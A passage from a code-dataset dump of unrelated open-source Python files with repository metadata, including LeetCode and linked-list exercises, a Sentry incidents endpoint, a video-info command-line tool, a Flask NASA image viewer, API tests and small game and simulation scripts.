event.y\n\ngui.map.bind(\"\", moved)\ngui.map.bind(\"\", click)\ntag = gui.map.create_text(10, 10, text=\"\", anchor=\"nw\")\n\ngui.map.after(dt_g, update)\ngui.root.mainloop()\n","repo_name":"FabAlchemy/traffic-simulator","sub_path":"Traffic Simulation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"19454426292","text":"from django.urls import path, re_path\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('api/admin_login', views.login_admin, name=\"login\"),\n path('api/events', views.get_events, name=\"get_events\"),\n path('api/people', views.get_people, name=\"get_people\"),\n path('api/add_person', views.add_person, name=\"add_person\"),\n re_path(\"/\", views.index, name=\"index\")\n]","repo_name":"smillett162/csa-project","sub_path":"csa_website/frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24639312634","text":"import os\r\nimport cv2\r\nrename='jpg'\r\nbad_images=[]\r\nbad_ext=[]\r\nfor subdir, dirs, files in os.walk(r'C:\\Python_Content\\People_2'):\r\n for filename in files:\r\n filepath = subdir + os.sep + filename\r\n #Get the extension and remove . from it\r\n base_file, ext = os.path.splitext(filepath)\r\n ext = ext.replace('.','') \r\n print (filepath)\r\n if ext in rename:\r\n #Create the new file name\r\n new_ext = rename\r\n new_file = base_file + '.' + 'jpeg'\r\n #Create the full old and new path\r\n old_path = os.path.join(r'C:\\Users\\meima\\Downloads\\People', filepath)\r\n new_path = os.path.join(r'C:\\Users\\meima\\Downloads\\People', new_file)\r\n\r\n #Rename the file\r\n os.rename(old_path, new_path)\r\n \r\nif len(bad_images) !=0:\r\n print('improper image files are listed below')\r\n for i in range (len(bad_images)):\r\n os.remove(bad_images[i])\r\n \r\nelse:\r\n print(' no improper image files were found')\r\n \r\n\r\n\r\n'''\r\nif os.path.isfile(filepath):\r\n try:\r\n img=cv2.imread(filepath)\r\n shape=img.shape\r\n except:\r\n print('file ', filepath, ' is not a valid image file')\r\n bad_images.append(filepath)\r\n else:\r\n print('*** fatal error, you a sub directory in class directory ')\r\n'''","repo_name":"Mmei99/Projects-ML-Class","sub_path":"Change_Ext.py","file_name":"Change_Ext.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28413293863","text":"# Proszę napisać funkcję, która rozdziela listę na dwie listy. Pierwsza\n# powinna zawierać klucze parzyste dodatnie, drugi klucze nieparzyste ujemne,\n# pozostałe elementy należy usunąć z pamięci. Do funkcji należy przekazać\n# wskaźniki na listę z danymi oraz wskaźniki na listy wynikowe. Funkcja\n# powinna zwrócić liczbę usuniętych elementów\n\n\nclass Node:\n def __init__(self, val, next = None):\n self.val = val\n self.next = next\n#end class\n\n\ndef put_guardian(p): # tworzy guardiana \n g = Node( None, p )\n return g \n#end def \n\n\ndef add(p, new_val): # dodawanie rekurencyjne\n\n if p.next is None:\n q = Node(new_val)\n p.next = q\n return\n\n if p.next is not None:\n if p.next.val == new_val:\n return\n\n elif p.next.val > new_val:\n q = Node(new_val)\n q.next = p.next \n p.next = q\n else:\n add(p.next, new_val)\n #end if \n#end def\n\n\ndef print_all(p):\n while p is not None:\n print(p.val, end = \" \")\n p = p.next\n #end while\n print()\n#end def\n\n\ndef create_linked_list_with_given_elements(L):\n g = Node(None)\n p = g\n\n for elem in L:\n p.next = Node(elem)\n p = p.next\n \n return g.next\n#end def\n\n\n\ndef separation(p,a,b):\n p = put_guardian( p )\n cnt = 0\n q = p\n\n while p.next is not None:\n\n if p.next.val % 2 == 0 and p.next.val > 0:\n tmp = p.next\n p.next = p.next.next\n\n # Doklejanie elementu do link listy a na poczatek:\n tmp.next = a.next \n a.next = tmp \n \n elif p.next.val % 2 == 1 and p.next.val < 0:\n tmp = p.next\n p.next = p.next.next\n\n # Doklejanie elementu do link listy b na poczatek:\n tmp.next = b.next \n b.next = tmp \n \n else:\n p.next = p.next.next\n cnt += 1 \n #end while\n return cnt,a,b\n # daj jeszcze returna na pozostale listy, sprawdz program\n#end def\n\na = None\na = put_guardian(a)\nb = None\nb = put_guardian(b)\n\nT = [1,-2,-3,4,-5,6,7,-8,9,10,11,12]\n\np = create_linked_list_with_given_elements( T )\n\n\ncnt,a,b= separation(p,a,b)\nprint_all(a.next)\nprint_all(b.next)\nprint(cnt)\n\n\n\n\n\n\n\n","repo_name":"pawlowiczf/WDI-2023","sub_path":"WDI zestaw 7/31.py","file_name":"31.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"pl","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"22518263657","text":"#!/usr/bin/env python\nfrom typing import List\n\nclass Solution1:\n def isCovered(self, ranges: List[List[int]], left: int, right: int) -> bool:\n covered = set()\n for a, b in ranges:\n for num in range(a, b+1):\n covered.add(num)\n\n for num in range(left, right+1):\n if num not in covered: return False\n return True\n\nclass Solution2:\n def isCovered(self, ranges: List[List[int]], left: int, right: int) -> bool:\n diff = [0 for _ in range(52)]\n for a, b in ranges:\n diff[a] += 1\n diff[b+1] -= 1\n\n s = 0\n for i in range(len(diff)):\n s += diff[i]\n if left <= i <= right and s <= 0: return False\n return True","repo_name":"ftakanashi/JobProjects","sub_path":"LeetCode/1893.检查区域内是否所有整数都被覆盖/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"36968480978","text":"from __future__ import absolute_import\n\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import PermissionDenied\nfrom rest_framework.response import Response\n\nfrom sentry import features\nfrom sentry.api.bases.incident import IncidentPermission\nfrom sentry.api.bases.organization import OrganizationEndpoint\nfrom sentry.api.exceptions import ResourceDoesNotExist\nfrom sentry.api.paginator import OffsetPaginator\nfrom sentry.api.serializers import serialize\nfrom sentry.api.serializers.rest_framework import ListField\nfrom sentry.incidents.logic import create_incident\nfrom sentry.incidents.models import (\n Incident,\n IncidentStatus,\n IncidentType,\n)\nfrom sentry.models.group import Group\nfrom sentry.models.project import Project\n\n\nclass IncidentSerializer(serializers.Serializer):\n projects = ListField(\n child=serializers.CharField(),\n required=False,\n default=[],\n )\n groups = ListField(\n child=serializers.CharField(),\n required=True,\n allow_null=False,\n )\n title = serializers.CharField(required=True)\n query = serializers.CharField(required=False, allow_blank=True, allow_null=True)\n dateStarted = serializers.DateTimeField(required=True)\n dateDetected = serializers.DateTimeField(required=False, allow_null=True)\n\n def validate_projects(self, slugs):\n projects = Project.objects.filter(\n organization=self.context['organization'],\n slug__in=slugs,\n )\n if len(projects) != len(slugs):\n raise serializers.ValidationError('Invalid project slug(s)')\n return list(projects)\n\n def validate_groups(self, group_ids):\n groups = Group.objects.filter(\n project__organization=self.context['organization'],\n id__in=group_ids,\n ).select_related('project')\n if len(groups) != len(group_ids):\n raise serializers.ValidationError('Invalid group id(s)')\n return list(groups)\n\n\nclass OrganizationIncidentIndexEndpoint(OrganizationEndpoint):\n permission_classes = (IncidentPermission, )\n\n def get(self, request, organization):\n \"\"\"\n List Incidents that a User can access within an Organization\n ````````````````````````````````````````````````````````````\n Returns a paginated list of Incidents that a user can access.\n\n :auth: required\n \"\"\"\n if not features.has('organizations:incidents', organization, actor=request.user):\n raise ResourceDoesNotExist\n\n incidents = Incident.objects.fetch_for_organization(\n organization,\n self.get_projects(request, organization),\n )\n\n query_status = request.GET.get('status')\n\n if query_status == 'open':\n incidents = incidents.filter(status=IncidentStatus.OPEN.value)\n elif query_status == 'closed':\n incidents = incidents.filter(status=IncidentStatus.CLOSED.value)\n\n return self.paginate(\n request,\n queryset=incidents,\n order_by='-date_started',\n paginator_cls=OffsetPaginator,\n on_results=lambda x: serialize(x, request.user),\n default_per_page=25,\n )\n\n def post(self, request, organization):\n if not features.has('organizations:incidents', organization, actor=request.user):\n return self.respond(status=404)\n\n serializer = IncidentSerializer(\n data=request.data,\n context={'organization': organization},\n )\n\n if serializer.is_valid():\n\n result = serializer.validated_data\n groups = result['groups']\n all_projects = set(result['projects']) | set(g.project for g in result['groups'])\n if any(p for p in all_projects if not request.access.has_project_access(p)):\n raise PermissionDenied\n\n incident = create_incident(\n organization=organization,\n type=IncidentType.CREATED,\n title=result['title'],\n query=result.get('query', ''),\n date_started=result['dateStarted'],\n date_detected=result.get('dateDetected', result['dateStarted']),\n projects=result['projects'],\n groups=groups,\n user=request.user,\n )\n return Response(serialize(incident, request.user), status=201)\n return Response(serializer.errors, status=400)\n","repo_name":"GaryChen66/sentry","sub_path":"src/sentry/api/endpoints/organization_incident_index.py","file_name":"organization_incident_index.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2345372621","text":"import io\nimport sys\nimport json\n\nfrom lib.b import log\nfrom lib import entry, version\n\nVERSION_STR = 'parse_video version ' + version.parse_video_version\n\n# global data\netc = {}\netc['log_level'] = None\t# default, or 'debug', 'quiet'\n\netc['hd_min'] = None\netc['hd_max'] = None\netc['i_min'] = None\netc['i_max'] = None\n\netc['extractor'] = ''\netc['method'] = ''\n\netc['url'] = ''\netc['flag_mode'] = None\t# default mode, or 'help', 'version', 'license'\netc['output'] = '-'\t# '-' means stdout\netc['more'] = None\n\netc['flag_fix_unicode'] = False\netc['network_timeout_s'] = -1\t# -1 means no limit\netc['flag_fix_enable_more'] = False\n\n\n# print help, version and license info. (--help, --version, --license)\ndef p_help():\n print('''\\\nUsage: parsev [OPTION]... URL\nparse_video: get video info from some web sites. \n\n -i, --min HD set min hd number for video formats\n -M, --max HD set max hd\n --i-min INDEX set min index number for part video files\n --i-max INDEX set max index\n \n -e, --extractor EXTRACTOR set extractor (and extractor arguments)\n -m, --method METHOD set method (and method arguments)\n \n -o, --output FILE write result (video info) to file (default to stdout)\n --more FILE input more info from file to enable more mode\n \n --network-timeout-s set timeout (second) to network operations\n \n -d, --debug set log level to debug\n -q, --quiet set log level to quiet\n \n --help display this help and exit\n --version output version information and exit\n --license show license information and exit\n\nMore information online: \\\n''')\n\ndef p_version():\n print(VERSION_STR + '''\n\n parse_video Copyright (C) 2015-2016 sceext \n This program comes with ABSOLUTELY NO WARRANTY. This is free software, and \n you are welcome to redistribute it under certain conditions. \n\nLicense GPLv3+: GNU GPL version 3 or later . \nPlease use \"--license\" or read LICENSE for more details. \\\n''')\n\ndef p_license():\n print('''\\\n parse_video : get video info from some web sites. \n Copyright (C) 2015-2016 sceext \n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see . \\\n''')\n\n# print function\ndef p(raw):\n print(raw, file=sys.stderr, flush=True)\n\ndef p_cline_err():\n p('ERROR: bad command line format, please try \\\"--help\\\". ')\n\ndef main(args):\n try:\n p_args(args)\n except Exception:\n p_cline_err()\n raise\n # process main start mode\n mode = etc['flag_mode']\n if mode == 'help':\n p_help()\n elif mode == 'version':\n p_version()\n elif mode == 'license':\n p_license()\n else:\t# default mode\n # check command line format Error\n if etc['url'] == '':\n p_cline_err()\n else:\n do_parse()\n # end main\n\n# NOTE more info file must be json file\ndef load_more_file(fpath):\n # NOTE support '-', read more info from stdin\n if fpath != '-':\n with open(fpath, 'rb') as f:\n blob = f.read()\n else:\t# read from stdin\n blob = sys.stdin.read()\t# NOTE just read blob\n # NOTE parse blob to json\n text = blob\n if not isinstance(text, str):\t# check to decode\n text = text.decode('utf-8')\n more_info = json.loads(text)\n return more_info\n\n\ndef do_parse():\n if etc['log_level'] != None:\n log.set_log_level(etc['log_level'])\n # set lib.var\n entry.init()\n set_list = [\n 'hd_min', \n 'hd_max', \n 'i_min', \n 'i_max', \n ]\n for key in set_list:\n entry.var._[key] = etc[key]\n # check load more file\n if etc['more'] != None:\n try:\n more_info = load_more_file(etc['more'])\n except Exception as e:\n p('ERROR: can not load more info file \\\"' + etc['more'] + '\\\" ')\n raise\n entry.var._['more'] = more_info\t# do set more\n # NOTE print parse_video version info in debug mode\n if etc['log_level'] == 'debug':\n p('DEBUG: ' + VERSION_STR)\n # NOTE set network_timeout_s\n entry.conf.network_timeout_s = etc['network_timeout_s']\n # NOTE set --fix-enable-more\n if etc['flag_fix_enable_more']:\n entry.var._['flag_fix_enable_more'] = True\n # do parse\n pvinfo = entry.parse(etc['url'], extractor=etc['extractor'], method=etc['method'])\n # print result, check --output option\n if etc['output'] == '-':\t# stdout\n # NOTE support --fix-unicode here\n p_result(pvinfo, file=sys.stdout, blob=etc['flag_fix_unicode'])\n else:\t# open output file\n try:\n with open(etc['output'], 'wb') as f:\n p_result(pvinfo, file=f, blob=True)\n except Exception as e:\n p('ERROR: can not write to output file \\\"' + etc['output'] + '\\\" ')\n raise\n # done\n\ndef p_result(pvinfo, sort_keys=False, ensure_ascii=False, file=sys.stdout, blob=False):\n text = json.dumps(pvinfo, indent=4, sort_keys=sort_keys, ensure_ascii=ensure_ascii)\n if blob:\n text += '\\n'\n blob = text.encode('utf-8')\n # NOTE fix write here\n if isinstance(file, io.TextIOWrapper):\n file = file.buffer\n file.write(blob)\n else:\n print(text, file=file, flush=True)\n\n# process command line args\ndef p_args(args):\n # TODO support --options-overwrite-once\n rest = args.copy()\n while len(rest) > 0:\n one, rest = rest[0], rest[1:]\n # --help, --version, --license\n if one == '--help':\n etc['flag_mode'] = 'help'\n elif one == '--version':\n if etc['flag_mode'] != None:\n p('ERROR: already set mode to \\\"' + etc['flag_mode'] + '\\\", can not set to --version ')\n else:\n etc['flag_mode'] = 'version'\n elif one == '--license':\n etc['flag_mode'] = 'license'\n # --debug, --quiet\n elif one in ['--debug', '-d']:\n etc['log_level'] = 'debug'\n elif one in ['--quiet', '-q']:\n if etc['log_level'] != None:\n p('ERROR: already set log_level to \\\"' + etc['log_level'] + '\\\", can not set to --quiet ')\n else:\n etc['log_level'] = 'quiet'\n # --min, --max, --min-i, --max-i\n elif one in ['--min', '-i']:\n etc['hd_min'] = float(rest[0])\n rest = rest[1:]\n elif one in ['--max', '-M']:\n etc['hd_max'] = float(rest[0])\n rest = rest[1:]\n elif one == '--i-min':\n etc['i_min'] = float(rest[0])\n rest = rest[1:]\n elif one == '--i-max':\n etc['i_max'] = float(rest[0])\n rest = rest[1:]\n # --extractor, --method\n elif one in ['--extractor', '-e']:\n etc['extractor'] = rest[0]\n rest = rest[1:]\n elif one in ['--method', '-m']:\n etc['method'] = rest[0]\n rest = rest[1:]\n # --output, --more\n elif one in ['--output', '-o']:\n etc['output'] = rest[0]\n rest = rest[1:]\n elif one == '--more':\n etc['more'] = rest[0]\n rest = rest[1:]\n # --fix-unicode\n elif one == '--fix-unicode':\n etc['flag_fix_unicode'] = True\n # --fix-enable-more\n elif one == '--fix-enable-more':\n etc['flag_fix_enable_more'] = True\n # TODO support --options-overwrite-once\n elif one == '--options-overwrite-once':\n pass\t# TODO\n # network_timeout_s\n elif one == '--network-timeout-s':\n etc['network_timeout_s'] = float(rest[0])\n rest = rest[1:]\n # URL\n else:\t# NOTE set URL\n if etc['url'] != '':\n p('WARNING: already set URL to \\\"' + etc['url'] + '\\\", now set to \\\"' + one + '\\\" ')\n etc['url'] = one\n # done p_args\n\n# end parse_video.py\n\n\n","repo_name":"wwqgtxx/lyp_pv","sub_path":"bin/parse_video.py","file_name":"parse_video.py","file_ext":"py","file_size_in_byte":8541,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"8527573779","text":"from flask import Flask, escape, request, render_template\nimport urllib3\nimport json\n\napp = Flask(__name__)\n@app.route('/')\ndef hello():\n print(__name__)\n\n http = urllib3.PoolManager()\n response = http.request(\n 'GET', \"https://api.nasa.gov/planetary/apod?api_key=XZwpcj1OVbMqNtKpVeQu7RDu1yrZ1gjyNxJyEe7c\")\n dat = response.data\n\n print(dat)\n\n link = json.loads(dat)[\"url\"]\n expl = json.loads(dat)[\"explanation\"]\n\n return render_template(\"img.html\", image=link, explanation=expl)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"moodyRahman/moodysoftdevgang","sub_path":"24_rest/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4235592650","text":"from .common_utils import *\r\n\r\ndef put_in_center(img_np, target_size):\r\n img_out = np.zeros([3, target_size[0], target_size[1]])\r\n \r\n bbox = [\r\n int((target_size[0] - img_np.shape[1]) / 2),\r\n int((target_size[1] - img_np.shape[2]) / 2),\r\n int((target_size[0] + img_np.shape[1]) / 2),\r\n int((target_size[1] + img_np.shape[2]) / 2),\r\n ]\r\n \r\n img_out[:, bbox[0]:bbox[2], bbox[1]:bbox[3]] = img_np\r\n \r\n return img_out\r\n\r\n\r\n\r\ndef tv_loss(x, beta = 0.5):\r\n '''Calculates TV loss for an image `x`.\r\n \r\n Args:\r\n x: image, torch.Variable of torch.Tensor\r\n beta: See https://arxiv.org/abs/1412.0035 (fig. 2) to see effect of `beta` \r\n '''\r\n dh = torch.pow(x[:,:,:,1:] - x[:,:,:,:-1], 2)\r\n dw = torch.pow(x[:,:,1:,:] - x[:,:,:-1,:], 2)\r\n \r\n return torch.sum(torch.pow(dh[:, :, :-1] + dw[:, :, :, :-1], beta))\r\n","repo_name":"miaoyuchun/DDS2M","sub_path":"utils/sr_utils.py","file_name":"sr_utils.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"77"} +{"seq_id":"74661058488","text":"import pytest\n\n\n@pytest.mark.parametrize(\"name, country_code, token_selector_func, default_disbursement, minimum_vendor_payout_withdrawal, status_code\", [\n (\"Test Org\", 'AU', lambda t: t.id, 5, 10, 201),\n (None, None, lambda t: t.id, 5, 10, 400),\n (\"Test Org\", None, lambda t: t.id, 5, 10, 400),\n (\"Test Org 2\", 'asdf', lambda t: t.id, 5, 10, 400),\n (\"New Test Org\", 'AU', lambda t: 1932380198, 5, 10, 404),\n])\ndef test_create_organisation(test_client, complete_admin_auth_token, external_reserve_token,\n name, country_code, token_selector_func, default_disbursement, minimum_vendor_payout_withdrawal, status_code):\n\n response = test_client.post(\n '/api/v1/organisation/',\n headers=dict(\n Authorization=complete_admin_auth_token,\n Accept='application/json'\n ),\n json={\n 'organisation_name': name,\n 'timezone': 'GMT',\n 'token_id': token_selector_func(external_reserve_token),\n 'country_code': country_code,\n 'default_disbursement': default_disbursement,\n 'minimum_vendor_payout_withdrawal': minimum_vendor_payout_withdrawal,\n })\n\n assert response.status_code == status_code\n\n if status_code == 201:\n assert response.json['data']['organisation']['primary_blockchain_address']\n assert response.json['data']['organisation']['default_disbursement'] == default_disbursement\n assert response.json['data']['organisation']['minimum_vendor_payout_withdrawal'] == minimum_vendor_payout_withdrawal\n\n\n@pytest.mark.parametrize(\"org_selector_func, status_code\", [\n (lambda o: o.id, 200),\n (lambda o: 1222103, 404),\n])\ndef test_get_organisation(test_client, complete_admin_auth_token,\n create_organisation, org_selector_func, status_code):\n response = test_client.get(\n f\"/api/v1/organisation/{org_selector_func(create_organisation)}/\",\n headers=dict(\n Authorization=complete_admin_auth_token,\n Accept='application/json'\n ))\n\n assert response.status_code == status_code\n\n","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/test_app/functional/api/test_organisation_api.py","file_name":"test_organisation_api.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"6897581722","text":"import re\nfrom .patterns import get_pattern\nfrom .error import GollyXMapsError, GollyXPatternsError\n\n\ndef pattern2url(pattern, xoffset=0, yoffset=0):\n rows = len(pattern)\n cols = len(pattern[0])\n listLife = []\n for i in range(rows):\n listLifeRow = {}\n for j in range(cols):\n if pattern[i][j] == \"o\":\n y = str(i + yoffset)\n x = j + xoffset\n if y in listLifeRow.keys():\n listLifeRow[y].append(x)\n else:\n listLifeRow[y] = [x]\n if len(listLifeRow.keys()) > 0:\n listLife.append(listLifeRow)\n\n s = str(listLife)\n s = s.split(\" \")\n listLife = \"\".join(s)\n listLife = re.sub(\"'\", '\"', listLife)\n return listLife\n\n\ndef print_pattern_url(\n p1=None,\n p2=None,\n xoff=[0, 0],\n yoff=[0, 0],\n hflip=[False, False],\n vflip=[False, False],\n rot=[0, 0],\n):\n url = \"\"\n for ip, pattern_name in enumerate([p1, p2]):\n if pattern_name is not None:\n pattern = get_pattern(pattern_name)\n\n if hflip[ip]:\n pattern = [j for j in reversed(pattern)]\n\n if vflip[ip]:\n pattern = [\"\".join(reversed(j)) for j in pattern]\n\n if rot[ip] in [90, 180, 270]:\n for i in range(rot[ip] // 90):\n pattern_tup = zip(*list(reversed(pattern)))\n pattern = [\"\".join(j) for j in pattern_tup]\n\n listLife = pattern2url(pattern)\n\n if len(url) > 0:\n url += \"&\"\n url += f\"s{ip+1}={listLife}\"\n print(url)\n\n\ndef retry_on_failure(func, *args, **kwargs):\n def wrap(*args, **kwargs):\n done = False\n maxcount = 10\n count = 0\n while not done and count < maxcount:\n try:\n return func(*args, **kwargs)\n except GollyXPatternsError:\n count += 1\n continue\n raise GollyXMapsError(f\"Error: retry failure for function {func.__name__}, tried {maxcount} times!\")\n\n return wrap\n","repo_name":"golly-splorts/gollyx-maps","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41084337113","text":"from pygame.draw import rect as drawrect\n\nfrom PPlay.sprite import Sprite\nfrom PPlay.window import Window\n\n\nclass PlayerHealthBar:\n janela = Window(1365, 768)\n # healthbar_sprite = Sprite(\"Assets/player_healthbar.png\")\n # healthbar_sprite.x = janela.width/2 - healthbar_sprite.width / 2\n # healthbar_sprite.y = janela.height - healthbar_sprite.height - 30\n healthbar_sprite = Sprite(\"Assets/hud/healthbar.png\")\n manabar_sprite = Sprite(\"Assets/hud/healthbar.png\", 5)\n healthbar_sprite.x = 158\n healthbar_sprite.y = 50\n manabar_sprite.x = healthbar_sprite.x\n manabar_sprite.y = healthbar_sprite.y + healthbar_sprite.height * 1.5\n max_mana = 100\n mana_atual = 100\n mana_ratio = mana_atual / max_mana\n old_mana_ratio = mana_ratio\n\n @classmethod\n def reset_class(cls):\n cls.janela = Window(1365, 768)\n # healthbar_sprite = Sprite(\"Assets/player_healthbar.png\")\n # healthbar_sprite.x = janela.width/2 - healthbar_sprite.width / 2\n # healthbar_sprite.y = janela.height - healthbar_sprite.height - 30\n cls.healthbar_sprite = Sprite(\"Assets/hud/healthbar.png\")\n cls.manabar_sprite = Sprite(\"Assets/hud/healthbar.png\", 5)\n cls.healthbar_sprite.x = 158\n cls.healthbar_sprite.y = 50\n cls.manabar_sprite.x = cls.healthbar_sprite.x\n cls.manabar_sprite.y = cls.healthbar_sprite.y + cls.healthbar_sprite.height * 1.5\n cls.max_mana = 100\n cls.mana_atual = 100\n cls.mana_ratio = cls.mana_atual / cls.max_mana\n cls.old_mana_ratio = cls.mana_ratio\n\n def __init__(self, max_health, starting_health, janela):\n self.max_health = max_health\n self.health_atual = starting_health\n self.old_health = self.health_atual\n self.janela = janela\n self.health_ratio = self.health_atual / self.max_health\n self.old_health_ratio = self.health_atual / self.max_health\n\n def draw(self):\n self.mostrar_dano_levado()\n self.mostrar_mana_perdida()\n drawrect(self.janela.screen, (255, 0, 0), (self.healthbar_sprite.x, self.healthbar_sprite.y,\n self.healthbar_sprite.width * self.health_ratio,\n self.healthbar_sprite.height))\n self.healthbar_sprite.draw()\n self.mana_atual += 3 * self.janela.delta_time()\n if self.mana_atual >= self.max_mana:\n self.mana_atual = self.max_mana\n self.draw_mana()\n self.manabar_sprite.draw()\n\n def levar_dano(self, qtd_dano):\n self.old_health = self.health_atual\n self.old_health_ratio = self.old_health / self.max_health\n self.health_atual -= qtd_dano\n if self.health_atual < 0:\n self.health_atual = 0\n self.health_ratio = self.health_atual / self.max_health\n\n def mostrar_dano_levado(self):\n drawrect(self.janela.screen, (255, 255, 255), (self.healthbar_sprite.x, self.healthbar_sprite.y,\n self.healthbar_sprite.width * self.old_health_ratio,\n self.healthbar_sprite.height))\n self.old_health -= self.max_health * 0.2 * self.janela.delta_time() / 3\n if self.old_health < 0:\n self.old_health = 0\n self.old_health_ratio = self.old_health / self.max_health\n\n def draw_mana(self):\n self.mana_ratio = self.mana_atual / self.max_mana\n # print(self.mana_ratio)\n drawrect(self.janela.screen, (15, 15, 255), (self.manabar_sprite.x, self.manabar_sprite.y,\n self.manabar_sprite.width * self.mana_ratio,\n self.manabar_sprite.height))\n\n def perder_mana(self, qtd_mana):\n self.old_mana_ratio = self.mana_ratio\n self.mana_atual -= qtd_mana\n self.mana_ratio = self.mana_atual / self.max_mana\n # print(self.mana_ratio)\n if self.mana_ratio < 0:\n self.mana_ratio = 0\n\n def mostrar_mana_perdida(self):\n drawrect(self.janela.screen, (255, 255, 255), (self.manabar_sprite.x, self.manabar_sprite.y,\n self.manabar_sprite.width * self.old_mana_ratio,\n self.manabar_sprite.height))\n self.old_mana_ratio -= self.max_mana * 1 * self.janela.delta_time() / 1.5\n","repo_name":"resendelucas/BrokenSound","sub_path":"playerhealthbar.py","file_name":"playerhealthbar.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36340387505","text":"# 최대공약수와 최소공배수\n\n# 두 수를 입력받아 두 수의 최대공약수와 최소공배수를 반환하는 함수, solution을 완성해 보세요. \n# 배열의 맨 앞에 최대공약수, 그다음 최소공배수를 넣어 반환하면 됩니다. \n# 예를 들어 두 수 3, 12의 최대공약수는 3, 최소공배수는 12이므로 solution(3, 12)는 [3, 12]를 반환해야 합니다.\n\ndef solution(n, m):\n a = m if n > m else n\n max_factor = max([i for i in range(1, a+1) if n % i == 0 and m % i == 0])\n \n min_mul = int(max_factor * (n/max_factor) * (m/max_factor))\n return [max_factor, min_mul]\n \nprint(solution(3, 12)) # [3, 12]\nprint(solution(2, 5)) # [1, 10]\n\n# 추가 : 다른 사람들 풀이 보니 유클리도 호재법? 이거 많이 써서 풀던데 나중에 한번 이걸로 해보자.","repo_name":"Kimeunseong/Programmers","sub_path":"Lv1/29_최대공약수와 최소공배수.py","file_name":"29_최대공약수와 최소공배수.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44263849815","text":"\n\"\"\"\n题目:排序链表\nleetcode地址:https://leetcode-cn.com/problems/sort-list/\n\n思路:\n解法一:\n1. 题目中要求时间复杂度是nlogn,因而我们可以想到归并排序,首先得找到链表的中点;\n2. 快慢指针,当快指针到末尾的时候,慢指针就到中间了,进行分割;\n3. 对分割后的left和right进行递归排序;\n4. 合并左右两边,首先创建一个头节点,各自遍历左右两边,哪边小,就加入到头节点的next里;\n5. 最后判断左右两边,看哪边还有数据,加到next里;\n6. 返回合并后的链表;\n\n复杂度分析:\n1. 时间复杂度:O(nlogn)\n2. 空间复杂度:O(logn)\n\"\"\"\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def sortList(self, head:ListNode) -> ListNode:\n if not head or not head.next:\n return head\n \n slow, fast = head, head.next\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n mid = slow.next\n slow.next = None\n left, right = self.sortList(head), self.sortList(mid)\n\n h = res = ListNode(0)\n while left and right:\n if left.val < right.val:\n h.next = left\n left = left.next\n else:\n h.next = right\n right = right.next\n h = h.next\n h.next = left if left else right\n return res.next\n \n\n\n\n","repo_name":"anpengjin/Leetcode_hot100","sub_path":"python/链表/148.py","file_name":"148.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34577531088","text":"from veiculos import Veiculo, Carro, Moto, Bicicleta\n\nclass Corrida:\n def __init__(self, veiculos):\n self.veiculos = veiculos\n\n def iniciar(self):\n for veiculo in self.veiculos:\n if not isinstance(veiculo, Veiculo):\n raise TypeError(f\"{veiculo} não é uma instância de Veiculo\")\n veiculo.acelerar(3)\n\n\n\ncarro = Carro(\"Fusca\", 2020, \"VW\")\nmoto = Moto(\"Biz\", 2020, \"Honda\")\nbicicleta = Bicicleta()\n\ncorrida = Corrida(veiculos=[carro, moto, bicicleta])\ncorrida.iniciar()","repo_name":"codarme/curso-python","sub_path":"lives/poo_python/exemplos/corrida_check_type.py","file_name":"corrida_check_type.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"pt","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"39878697829","text":"\nimport config\nimport urllib.request\nimport json\nimport sys\nimport html\nclang = \"en\" if user.name[0] in \"#!\" else config.User(user.name).lang\nurl = (\n \"https://www.googleapis.com/youtube/v3/search?q={}&part=snippet\"\n \"&maxResults=10&key=YOUTUBE_API_ID\"\n)\n\n\nif not args.strip():\n msg = config.get_lang(clang, \"missing_argument\")\n msg = 